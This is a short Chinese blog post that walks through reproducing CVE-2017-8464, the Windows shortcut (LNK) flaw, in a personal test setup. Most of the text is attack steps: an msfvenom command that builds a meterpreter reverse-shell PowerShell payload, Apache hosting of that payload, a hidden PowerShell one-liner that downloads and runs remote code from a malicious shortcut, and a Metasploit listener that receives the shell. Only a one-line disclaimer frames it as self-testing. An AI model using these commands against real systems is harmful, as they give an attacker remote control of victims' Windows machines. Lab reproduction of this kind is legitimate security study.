CVE-2017-8464漏洞复现

该漏洞以存在一段时间,由于能力问题一直未对该漏洞利用方式进行测试,今天学过程中记录一下测试流程。

  1. 确认系统是否存在该漏洞
  2. 使用msfvenom 生成反弹shell,shell生成方式如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1


生成反弹shell
确认生成文件
  1. 将生成文件放到apache网站根目录

sudo cp test.ps1 /var/www/html/


复制完成
  1. 启用apache服务

sudo service apache2 start
启动服务后通过curl方式测试是否正常访问

服务启动
  1. 在靶机上启用powershell链接

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存为exe文件。

新建快捷方式
保存
  1. 在攻击端监听反弹
    metasploit做以下相关配置:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run

启动监听
  1. 在被攻击端运行创建快捷键
  2. msf获取到远程shell
反弹成功
执行系统命令

仅作自己测试,请勿违规使用。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容